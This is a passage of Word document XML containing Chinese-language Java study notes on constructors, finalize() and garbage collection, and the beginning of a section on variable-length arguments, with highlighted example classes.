        <w:t xml:space="preserve"> protected)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B54BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一旦你定义了自己的构造方法，默认构造方法就会失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E7F7F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AE04C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F91CE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>一个简单的构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D5C97E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749FB3DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  int x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC46EB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D75FBB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>以下是构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58806432" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  MyClass() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5090B525" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    x = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A822442" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB5CD52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5292985B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CEBC588" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C05D084" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一个简单的构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661D372F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>class MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB011C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  int x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C64C64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6D5B2B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>以下是构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414F34FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  MyClass(int i ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B0F334" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    x = i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6EE031" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419B8A86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071DFE8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24BAAF07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class ConsDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9708B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BF4589" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MyClass t1 = new MyClass( 10 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDB65B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    MyClass t2 = new MyClass( 20 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA3297" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.println(t1.x + " " + t2.x);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D39029" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674E75C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4808F097" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A02AB85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>析构函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>finalize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737ADEE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:t>允许定义这样的方法，它在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象被垃圾收集器析构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>之前调用</w:t>
      </w:r>
      <w:r>
        <w:t>，这个方法叫做</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>finalize()</w:t>
      </w:r>
      <w:r>
        <w:t>，它用来清除回收对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC6896E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>例如，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> finalize() </w:t>
      </w:r>
      <w:r>
        <w:t>来确保一个对象打开的文件被关闭了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A93134F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> finalize() </w:t>
      </w:r>
      <w:r>
        <w:t>方法里，你必须指定在对象销毁时候要执行的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17588914" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">finalize() </w:t>
      </w:r>
      <w:r>
        <w:t>一般格式是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8F93C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31249554" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>protected void finalize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63818A29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E2E24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   // </w:t>
      </w:r>
      <w:r>
        <w:t>在这里终结代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D26D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A716FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> protected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是一个限定符，它确保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> finalize() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法不会被该类以外的代码调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6329B383" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>当然，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:t>的内存回收可以由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JVM </w:t>
      </w:r>
      <w:r>
        <w:t>来自动完成。如果你手动使用，则可以使用上面的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D88CFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA5D565" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F87DD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">public class FinalizationDemo {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFFE47E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public static void main(String[] args) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ED6B47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Cake c1 = new Cake(1);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74392A6D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Cake c2 = new Cake(2);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D9B2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Cake c3 = new Cake(3);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD6BF54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B76B2E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    c2 = c3 = null;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BA73BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>System.gc(); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>垃圾收集器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F693AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BCC95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66343237" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7749C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">class Cake extends Object {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A559941" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  private int id;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E51D2B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  public Cake(int id) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609CCA31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    this.id = id;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A05B641" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.println("Cake Object " + id + "is created");  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482DD080" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A4A621" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6785FB7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  protected void finalize() throws java.lang.Throwable {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D8011" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    super.finalize();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F6D29D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println("Cake Object " + id + "is disposed");  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FA7A9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213EF856" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C9B52A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6037CF64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可变参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581C25F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JDK 1.5 </w:t>
      </w:r>
      <w:r>
        <w:t>开始，</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>支持传递同类型的可变参数给一个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE856A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>方法的可变参数的声明如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5054A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>typeName... parameterName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACC4F4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在方法声明中，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指定参数类型后加一个省略号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0B2580" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一个方法中只能指定一个可变参数，它必须是方法的最后一个参数。</w:t>
      </w:r>
      <w:r>
        <w:t>任何普通的参数必须在它之前声明。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA61F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
